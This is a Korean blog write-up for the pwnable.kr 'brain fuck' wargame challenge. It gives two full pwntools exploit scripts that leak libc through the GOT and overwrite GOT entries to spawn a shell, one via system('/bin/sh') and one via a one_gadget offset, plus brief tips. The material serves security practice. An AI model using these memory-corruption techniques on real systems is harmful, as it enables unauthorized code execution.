Wargame/▷ pwnable.kr
[pwnable.kr] brain fuck
Gyeongje
2018. 7. 20. 00:46
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 | from pwn import * #p = process('./bf') p = remote('pwnable.kr',9001) #e = ELF('/lib/i386-linux-gnu/libc-2.23.so') e = ELF('./bf_libc.so') point = 0x804a0a0 pnum = 0 memset_got = 0x804a02c fgets_got = 0x804a010 putchar_got = 0x804a030 pnum = point - fgets_got point -= pnum payload = '<' * pnum payload += '.>' * 4 payload += '<' * 4 payload += ',>' * 4 payload += '<' * 4 pnum = memset_got - point point += pnum payload += '>' * pnum payload += ',>' * 4 payload += '<' * 4 pnum = putchar_got - point point += pnum payload += '>' * pnum payload += ',>' * 4 payload += '<' * 4 payload += '.' p.sendlineafter('[ ]\n', payload) fgets = u32(p.recvn(4)) #fgets.got.plt leak base = fgets - e.symbols['fgets'] gets = base + e.symbols['gets'] system = base + e.symbols['system'] main = 0x08048671 print 'fgets : ' + hex(fgets) print 'base : ' + hex(base) print 'gets : ' + hex(gets) print 'system : ' + hex(system) p.send(p32(system)) #fgets_got p.send(p32(gets)) #memset_got p.send(p32(main)) #putchar_got p.sendline('/bin/sh\00') p.interactive() | cs |
꿀잼이다 ㅎㅎ
여기서 memset을 기준으로 leak을 했을때 라이브러리(libc) 충돌이 일어나서 offset 계산이 잘 안되가지구 fgets로 계산했더니 잘되더라 ㅎㅎ..
그리고 한글자씩 출력하는데 local에선 recv로도 되지만 서버에선 느리기때문에 sleep을 걸어주거나 recvn을 사용하면 소켓 전송을 잘 잡을 수 있다 ㅎ_ㅎ
[one shot]
one_gadget ./bf_libc 치면 오프셋 나옴 base에 더하면 됨
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 | from pwn import * #p = process('./bf') p = remote('pwnable.kr',9001) #e = ELF('/lib/i386-linux-gnu/libc-2.23.so') e = ELF('./bf_libc.so') point = 0x804a0a0 pnum = 0 memset_got = 0x804a02c fgets_got = 0x804a010 putchar_got = 0x804a030 pnum = point - fgets_got point -= pnum payload = '<' * pnum payload += '.>' * 4 payload += '<' * 4 payload += ',>' * 4 payload += '<' * 4 pnum = memset_got - point point += pnum payload += '>' * pnum #payload += ',>' * 4 #payload += '<' * 4 pnum = putchar_got - point point += pnum payload += '>' * pnum payload += ',>' * 4 payload += '<' * 4 payload += '.' p.sendlineafter('[ ]\n', payload) fgets = u32(p.recvn(4)) #fgets.got.plt leak base = fgets - e.symbols['fgets'] gets = base + e.symbols['gets'] system = base + e.symbols['system'] one_shot = base + 0x3a7ec main = 0x08048671 print 'fgets : ' + hex(fgets) print 'base : ' + hex(base) print 'gets : ' + hex(gets) print 'system : ' + hex(system) print 'one_shot : ' + hex(one_shot) p.send(p32(one_shot)) #p.send(p32(system)) #fgets_got #p.send(p32(gets)) #memset_got p.send(p32(main)) #putchar_got #p.sendline('/bin/sh\00') p.interactive() | cs |